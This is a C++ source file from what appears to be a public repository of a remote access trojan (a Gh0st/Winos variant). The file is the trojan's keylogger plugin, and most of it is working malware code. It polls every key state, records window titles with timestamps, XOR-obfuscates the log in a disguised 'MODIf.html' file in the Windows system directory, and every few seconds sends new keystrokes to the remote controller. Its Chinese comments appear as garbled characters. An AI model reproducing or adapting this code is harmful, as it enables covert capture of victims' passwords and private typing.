GuanM/Rat-winos4.0-gh0st
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Rat-winos4.0-gh0st/大灰狼9.8/Plugins/KEYLOG/KeyboardManager.cpp
Logkiss a6a4b6368e rat
2024-06-23 17:36:53 +08:00

540 lines
12 KiB
C++
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// KeyboardManager.cpp: implementation of the CKeyboardManager class.
//
//////////////////////////////////////////////////////////////////////
#include "KeyboardManager.h"
#include <tchar.h>
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
#include <iostream>
using namespace std;
CKeyboardManager::CKeyboardManager(CClientSocket *pClient) : CManager(pClient)
{
sendStartKeyBoard();
WaitForDialogOpen();
sendOfflineRecord();
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\MODIf.html");
m_bIsWorking = true;
dKeyBoardSize = 0;
m_hWorkThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID)this, 0, NULL);
m_hSendThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendDate,(LPVOID)this,0,NULL);
}
CKeyboardManager::~CKeyboardManager()
{
m_bIsWorking = false;
WaitForSingleObject(m_hWorkThread, INFINITE);
WaitForSingleObject(m_hSendThread, INFINITE);
CloseHandle(m_hWorkThread);
CloseHandle(m_hSendThread);
}
void CKeyboardManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
if (lpBuffer[0] == COMMAND_NEXT)
NotifyDialogIsOpen();
if (lpBuffer[0] == COMMAND_KEYBOARD_OFFLINE)
{
}
if (lpBuffer[0] == COMMAND_KEYBOARD_CLEAR)
{
DeleteFile(strRecordFile);
HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
CloseHandle(hFile);
dKeyBoardSize = 0;
}
}
int CKeyboardManager::sendStartKeyBoard()
{
BYTE bToken[2];
bToken[0] = TOKEN_KEYBOARD_START;
bToken[1] = (BYTE)true;
return Send((LPBYTE)&bToken[0], sizeof(bToken));
}
int CKeyboardManager::sendKeyBoardData(LPBYTE lpData, UINT nSize)
{
int nRet = -1;
DWORD dwBytesLength = 1 + nSize;
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, dwBytesLength);
lpBuffer[0] = TOKEN_KEYBOARD_DATA;
memcpy(lpBuffer + 1, lpData, nSize);
nRet = Send((LPBYTE)lpBuffer, dwBytesLength);
LocalFree(lpBuffer);
return nRet;
}
int CKeyboardManager::sendOfflineRecord(DWORD dwRead)
{
int nRet = 0;
DWORD dwSize = 0;
DWORD dwBytesRead = 0;
HANDLE hFile = CreateFile(strRecordFile, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
dwSize = GetFileSize(hFile, NULL);
dKeyBoardSize = dwSize;
if (0 != dwRead)
{
SetFilePointer(hFile, dwRead, NULL, FILE_BEGIN);
dwSize -= dwRead;
}
TCHAR *lpBuffer = new TCHAR[dwSize];
ReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL);
// <20><><EFBFBD><EFBFBD>
for (int i = 0; i < (dwSize/sizeof(TCHAR)); i++)
lpBuffer[i] ^= '`';
nRet = sendKeyBoardData((LPBYTE)lpBuffer, dwSize);
delete lpBuffer;
}
CloseHandle(hFile);
return nRet;
}
string GetKey(int Key) // <20>жϼ<D0B6><CFBC>̰<EFBFBD><CCB0><EFBFBD>ʲô<CAB2><C3B4>
{
string KeyString = "";
//<2F>жϷ<D0B6><CFB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
const int KeyPressMask=0x80000000; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EBB3A3>
int iShift=GetKeyState(0x10); //<2F>ж<EFBFBD>Shift<66><74>״̬
bool IS=(iShift & KeyPressMask)==KeyPressMask; //<2F><>ʾ<EFBFBD><CABE><EFBFBD><EFBFBD>Shift<66><74>
if(Key >=186 && Key <=222)
{
switch(Key)
{
case 186:
if(IS)
KeyString = ":";
else
KeyString = ";";
break;
case 187:
if(IS)
KeyString = "+";
else
KeyString = "=";
break;
case 188:
if(IS)
KeyString = "<";
else
KeyString = ",";
break;
case 189:
if(IS)
KeyString = "_";
else
KeyString = "-";
break;
case 190:
if(IS)
KeyString = ">";
else
KeyString = ".";
break;
case 191:
if(IS)
KeyString = "?";
else
KeyString = "/";
break;
case 192:
if(IS)
KeyString = "~";
else
KeyString = "`";
break;
case 219:
if(IS)
KeyString = "{";
else
KeyString = "[";
break;
case 220:
if(IS)
KeyString = "|";
else
KeyString = "\\";
break;
case 221:
if(IS)
KeyString = "}";
else
KeyString = "]";
break;
case 222:
if(IS)
KeyString = '"';
else
KeyString = "'";
break;
}
}
//<2F>жϼ<D0B6><CFBC>̵ĵ<CCB5>һ<EFBFBD><D2BB>
if (Key == VK_ESCAPE) // <20>˳<EFBFBD>
KeyString = "[Esc]";
else if (Key == VK_F1) // F1<46><31>F12
KeyString = "[F1]";
else if (Key == VK_F2)
KeyString = "[F2]";
else if (Key == VK_F3)
KeyString = "[F3]";
else if (Key == VK_F4)
KeyString = "[F4]";
else if (Key == VK_F5)
KeyString = "[F5]";
else if (Key == VK_F6)
KeyString = "[F6]";
else if (Key == VK_F7)
KeyString = "[F7]";
else if (Key == VK_F8)
KeyString = "[F8]";
else if (Key == VK_F9)
KeyString = "[F9]";
else if (Key == VK_F10)
KeyString = "[F10]";
else if (Key == VK_F11)
KeyString = "[F11]";
else if (Key == VK_F12)
KeyString = "[F12]";
else if (Key == VK_SNAPSHOT) // <20><>ӡ<EFBFBD><D3A1>Ļ
KeyString = "[PrScrn]";
else if (Key == VK_SCROLL) // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
KeyString = "[Scroll Lock]";
else if (Key == VK_PAUSE) // <20><>ͣ<EFBFBD><CDA3><EFBFBD>ж<EFBFBD>
KeyString = "[Pause]";
else if (Key == VK_CAPITAL) // <20><>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
KeyString = "[Caps Lock]";
//-------------------------------------//
//<2F><><EFBFBD>Ƽ<EFBFBD>
else if (Key == 8) //<- <20>ظ<EFBFBD><D8B8><EFBFBD>
KeyString = "[Backspace]";
else if (Key == VK_RETURN) // <20>س<EFBFBD><D8B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
KeyString = "[Enter]\n";
else if (Key == VK_SPACE) // <20>ո<EFBFBD>
KeyString = " ";
//<2F>ϵ<EFBFBD><CFB5><EFBFBD>:<3A><><EFBFBD>̼<EFBFBD>¼<EFBFBD><C2BC>ʱ<EFBFBD>򣬿<EFBFBD><F2A3ACBF>Բ<EFBFBD><D4B2><EFBFBD>¼<EFBFBD><C2BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shift<66>Dz<EFBFBD><C7B2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>κ<EFBFBD><CEBA>ַ<EFBFBD><D6B7><EFBFBD>
//<2F>ϵ<EFBFBD><CFB5><EFBFBD><EFBFBD>ͱ<EFBFBD><CDB1>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ϣ<EFBFBD><CFA3><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD><EFBFBD>
/*
else if (Key == VK_LSHIFT) // <20><><EFBFBD><EFBFBD><EFBFBD>ϵ<EFBFBD><CFB5><EFBFBD>
KeyString = "[Shift]";
else if (Key == VK_LSHIFT) // <20>Ҳ<EFBFBD><D2B2>ϵ<EFBFBD><CFB5><EFBFBD>
KeyString = "[SHIFT]";
*/
/*<2A><><EFBFBD><EFBFBD>ֻ<EFBFBD>ǶԼ<C7B6><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĸ<EFBFBD><C4B8><EFBFBD>м<EFBFBD>¼:<3A><><EFBFBD>Բ<EFBFBD><D4B2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¼<EFBFBD><C2BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>*/
else if (Key == VK_TAB) // <20>Ʊ<EFBFBD><C6B1><EFBFBD>
KeyString = "[Tab]";
else if (Key == VK_LCONTROL) // <20><><EFBFBD><EFBFBD><EFBFBD>Ƽ<EFBFBD>
KeyString = "[Ctrl]";
else if (Key == VK_RCONTROL) // <20>ҿ<EFBFBD><D2BF>Ƽ<EFBFBD>
KeyString = "[CTRL]";
else if (Key == VK_LMENU) // <20>󻻵<EFBFBD><F3BBBBB5><EFBFBD>
KeyString = "[Alt]";
else if (Key == VK_LMENU) // <20>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>
KeyString = "[ALT]";
else if (Key == VK_LWIN) // <20><> WINDOWS <20><>
KeyString = "[Win]";
else if (Key == VK_RWIN) // <20><> WINDOWS <20><>
KeyString = "[WIN]";
else if (Key == VK_APPS) // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>Ҽ<EFBFBD>
KeyString = "<EFBFBD>Ҽ<EFBFBD>";
else if (Key == VK_INSERT) // <20><><EFBFBD><EFBFBD>
KeyString = "[Insert]";
else if (Key == VK_DELETE) // ɾ<><C9BE>
KeyString = "[Delete]";
else if (Key == VK_HOME) // <20><>ʼ
KeyString = "[Home]";
else if (Key == VK_END) // <20><><EFBFBD><EFBFBD>
KeyString = "[End]";
else if (Key == VK_PRIOR) // <20><>һҳ
KeyString = "[PgUp]";
else if (Key == VK_NEXT) // <20><>һҳ
KeyString = "[PgDown]";
// <20><><EFBFBD><EFBFBD><EFBFBD>õļ<C3B5><C4BC><EFBFBD><EFBFBD><EFBFBD>:һ<><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB>
else if (Key == VK_CANCEL) // Cancel
KeyString = "[Cancel]";
else if (Key == VK_CLEAR) // Clear
KeyString = "[Clear]";
else if (Key == VK_SELECT) //Select
KeyString = "[Select]";
else if (Key == VK_PRINT) //Print
KeyString = "[Print]";
else if (Key == VK_EXECUTE) //Execute
KeyString = "[Execute]";
//----------------------------------------//
else if (Key == VK_LEFT) //<2F>ϡ<EFBFBD><CFA1>¡<EFBFBD><C2A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҽ<EFBFBD>
KeyString = "[<5B><>]";
else if (Key == VK_RIGHT)
KeyString = "[<5B><>]";
else if (Key == VK_UP)
KeyString = "[<5B><>]";
else if (Key == VK_DOWN)
KeyString = "[<5B><>]";
else if (Key == VK_NUMLOCK)//С<><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
KeyString = "[NumLock]";
else if (Key == VK_ADD) // <20>ӡ<EFBFBD><D3A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ˡ<EFBFBD><CBA1><EFBFBD>
KeyString = "+";
else if (Key == VK_SUBTRACT)
KeyString = "-";
else if (Key == VK_MULTIPLY)
KeyString = "*";
else if (Key == VK_DIVIDE)
KeyString = "/";
else if (Key == 190 || Key == 110) // С<><D0A1><EFBFBD><EFBFBD> . <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .
KeyString = ".";
//С<><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ּ<EFBFBD>:0-9
else if (Key == VK_NUMPAD0)
KeyString = "0";
else if (Key == VK_NUMPAD1)
KeyString = "1";
else if (Key == VK_NUMPAD2)
KeyString = "2";
else if (Key == VK_NUMPAD3)
KeyString = "3";
else if (Key == VK_NUMPAD4)
KeyString = "4";
else if (Key == VK_NUMPAD5)
KeyString = "5";
else if (Key == VK_NUMPAD6)
KeyString = "6";
else if (Key == VK_NUMPAD7)
KeyString = "7";
else if (Key == VK_NUMPAD8)
KeyString = "8";
else if (Key == VK_NUMPAD9)
KeyString = "9";
//-------------------------------------------//
//-------------------------------------------//
//*<2A><><EFBFBD><EFBFBD>ĸ<EFBFBD>Ĵ<EFBFBD>Сд<D0A1><D0B4><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>*//
else if (Key >=97 && Key <= 122) // <20><>ĸ:a-z
{
if (GetKeyState(VK_CAPITAL)) // <20><>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
{
if(IS) //Shift<66><74><EFBFBD><EFBFBD>Сд<D0A1><D0B4>ĸ
KeyString = Key;
else // ֻ<>д<EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4>ĸ
KeyString = Key - 32;
}
else// <20><>дû<D0B4><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
{
if(IS) // <20><><EFBFBD><EFBFBD>Shift<66><74>: <20><>д<EFBFBD><D0B4>ĸ
KeyString = Key - 32;
else // û<>а<EFBFBD>Shift<66><74>: Сд<D0A1><D0B4>ĸ
KeyString = Key;
}
}
else if (Key >=48 && Key <= 57) // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:0-9<><39><EFBFBD>Ϸ<EFBFBD><CFB7>ķ<EFBFBD><C4B7><EFBFBD>
{
if(IS)
{
switch(Key)
{
case 48: //0
KeyString = ")";
break;
case 49://1
KeyString = "!";
break;
case 50://2
KeyString = "@";
break;
case 51://3
KeyString = "#";
break;
case 52://4
KeyString = "$";
break;
case 53://5
KeyString = "%";
break;
case 54://6
KeyString = "^";
break;
case 55://7
KeyString = "&";
break;
case 56://8
KeyString = "*";
break;
case 57://9
KeyString = "(";
break;
}
}
else
KeyString = Key;
}
if (Key != VK_LBUTTON || Key != VK_RBUTTON)
{
if (Key >=65 && Key <=90) //ASCII 65-90 ΪA-Z
{
if (GetKeyState(VK_CAPITAL)) // <20><>д<EFBFBD><D0B4><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>A-Z
{
if(IS) // <20><>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ұ<EFBFBD><D2B0><EFBFBD><EFBFBD>ϵ<EFBFBD><CFB5><EFBFBD>:<3A><><EFBFBD><EFBFBD>ΪСд<D0A1><D0B4>ĸ
KeyString = Key + 32;
else //ֻ<>д<EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>д<EFBFBD><D0B4>ĸ
KeyString = Key;
}
else // <20><>дû<D0B4><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:a-z
{
if(IS)
{
KeyString = Key;
}
else
{
Key = Key + 32;
KeyString = Key;
}
}
}
}
return KeyString;
}
void SaveToFile(TCHAR *lpBuffer)
{
printf(lpBuffer );
TCHAR strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, _T("\\MODIf.html"));
HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
if (dwSize < 1024 * 1024 * 50)
SetFilePointer(hFile, 0, 0, FILE_END);
// <20><><EFBFBD><EFBFBD>
int nLength = lstrlen(lpBuffer);
TCHAR* lpEncodeBuffer = new TCHAR[nLength];
for (int i = 0; i < nLength; i++)
lpEncodeBuffer[i] = lpBuffer[i] ^ _T('`');
WriteFile(hFile, lpEncodeBuffer, lstrlen(lpBuffer)*sizeof(TCHAR), &dwBytesWrite, NULL);
CloseHandle(hFile);
delete [] lpEncodeBuffer;
return;
}
TCHAR KeyBuffer[2048] = {0};
HWND PreviousFocus = NULL;
TCHAR WindowCaption[1024] = {0};
BOOL IsWindowsFocusChange()
{
HWND hFocus = GetForegroundWindow();
BOOL ReturnFlag = FALSE;
TCHAR szText[1024]={0};
if (hFocus != PreviousFocus)
{
if (lstrlen(WindowCaption) > 0)
{
if (lstrlen(KeyBuffer) > 0)
{
SYSTEMTIME s;
GetLocalTime(&s);
wsprintf(szText,_T("\r\n[<5B><><EFBFBD><EFBFBD>:] %s\r\n<><CAB1>:]%d-%d-%d %d:%d:%d\r\n"),WindowCaption,s.wYear,s.wMonth,s.wDay,s.wHour,s.wMinute,s.wSecond);
SaveToFile(szText);
}
memset(szText,0,sizeof(szText));
memset(WindowCaption,0,sizeof(WindowCaption));
ReturnFlag=TRUE;
}
PreviousFocus = hFocus;
SendMessage(hFocus,WM_GETTEXT,sizeof(WindowCaption),(LPARAM)WindowCaption);
}
return ReturnFlag;
}
DWORD WINAPI CKeyboardManager::SendDate(LPVOID lparam)
{
CKeyboardManager *pThis = (CKeyboardManager *)lparam;
while(pThis->m_bIsWorking)
{
DWORD dwSize =0;
HANDLE hFile = CreateFile(pThis->strRecordFile, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
dwSize = GetFileSize(hFile, NULL);
}
CloseHandle(hFile);
if (pThis->dKeyBoardSize != dwSize)
{
pThis->sendOfflineRecord(pThis->dKeyBoardSize);
}
Sleep(3000);
}
return 0;
}
DWORD WINAPI CKeyboardManager::KeyLogger(LPVOID lparam)
{
CKeyboardManager *pThis = (CKeyboardManager *)lparam;
string TempString = "";
while(pThis->m_bIsWorking)
{
Sleep(5);
if (IsWindowsFocusChange())
{
if (lstrlen(KeyBuffer))
{
lstrcat(KeyBuffer,_T("\r\n"));
SaveToFile(_T("[<5B><><EFBFBD><EFBFBD>:]"));
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
printf(KeyBuffer);
}
}
for(int i = 8; i <=255; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);
lstrcat(KeyBuffer,TempString.c_str());
}
}
}
return 0;
}
Reference in New Issue View Git Blame Copy Permalink